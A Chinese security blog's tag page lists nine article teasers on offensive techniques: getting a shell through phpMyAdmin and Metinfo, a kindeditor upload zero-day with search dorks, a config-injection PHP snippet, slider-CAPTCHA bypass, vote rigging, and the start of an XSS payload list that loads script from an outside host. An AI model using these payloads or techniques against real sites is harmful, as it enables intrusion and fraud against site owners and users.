标签关键词

关于 技巧总结 的文章共有9条

hkjs

安全驻场工程师的自我救赎之路

阅读(59)评论(0)

前言 IT行业外包的现象已经是很普遍的现象了,安全自然也不例外,一些甲方的企业建设中,因为编制或资源的限制,通常会把自身不愿意组建团队来做的事情,外包出去,这通常就是很多驻场同事口中的ITO,因为编制与公司福利的不对等,很多驻场工程师心中都会有明显的“不平衡”感,即拿着乙方的薪水,操着甲方的心,生在甲方的阵营,活在乙方的世界。有时候甚至也会夹杂在...

hkjs

基于ThinkPHP的CMS审计思路

阅读(104)评论(0)

前言 yxtcmf6.1是一个基于thinkphp3.2.3的cms,19年3月份发布,用来练习代码审计是个不错的选择。 审计思路 由于这个cms采用MVC架构并且是基于thinkphp3.2.3的,所以先了解文件结构,知道不同的页面对应的文件位置在哪。然后搭建一个tp3.2.3了解一下这个框架,百度找找这个框架的漏洞,再...

hkjs

实战笔记:滑动验证码攻防对抗

阅读(108)评论(0)

一、背景介绍   在业务安全领域,滑动验证码已经是国内继传统字符型验证码之后的标配。众所周知,打码平台和机器学习这两种绕过验证码的方式,已经是攻击者很主流的思路,不再阐述。本文介绍的是一个冷门的绕过思路和防御方案。这些积累,均来自于实战之中,希望有用。 二、思路介绍 知己知彼,百战不殆。   &nbs...

hkjs

经典写配置漏洞与几种变形

阅读(130)评论(0)

0×01 基础版 特点:正则贪婪模式、无s单行模式: <?php $api = addslashes($_GET['api']); $file = file_get_contents('./option.php'); $file = preg_replace("/\\\$API = '.*';/", "\$API = '{$api}';"...

hkjs

记一次为学校排行刷票

阅读(136)评论(0)

一个漆黑的夜晚,接近十一点,辅导员在群里发了一个高校排行投票 打开看了下,我们学校才第三,1000+票,第一2W+(xxx信息工程学院) 相信他们是刷的票,搞信息的学校,大佬肯定多 想了想,还是帮学校一把吧,首先分析了一下 Cookie 不会验证用户: ip  不会验证用户: ...

hkjs

Phpmyadmin Get shell 思路汇总

阅读(1368)评论(0)

PhpMyadmin各版本漏洞合集 一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG 概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞 利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-20...

hkjs

Metinfo 5.X版本GETSHELL漏洞合集

阅读(1112)评论(0)

0x00 前言 2018年1月底某CMS官方隆重发布6.0版本,调整了之前“漏洞百出”的框架结构,修(杜)复(绝)了多个5.X的版本后台Gestshell漏洞。 0x01安装过程过滤不严导致Getshell 前提:有删除/config/install.lock权限 1. 结合网上爆出的后台任意文件删除漏洞...

hkjs

kindeditor<=4.1.5 Oday

阅读(1174)评论(1)

漏洞存在于 kindeditor 编辑器里,你能上传 .txt 和 .html 文件,支持 php/asp/jsp/asp.net 关键字: allinurl:/examples/uploadbutton.html allinurl:/php/upload_json.php / .asp ...

hkjs

【科普】77种Xss跨站姿势

阅读(1243)评论(0)

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>    (2)IMG标签XSS使用JavaScript命令  <SCRIPT SRC=http://3w.org/XSS/xss.js&g...



Powered by 小陈 © Boon theme By 小陈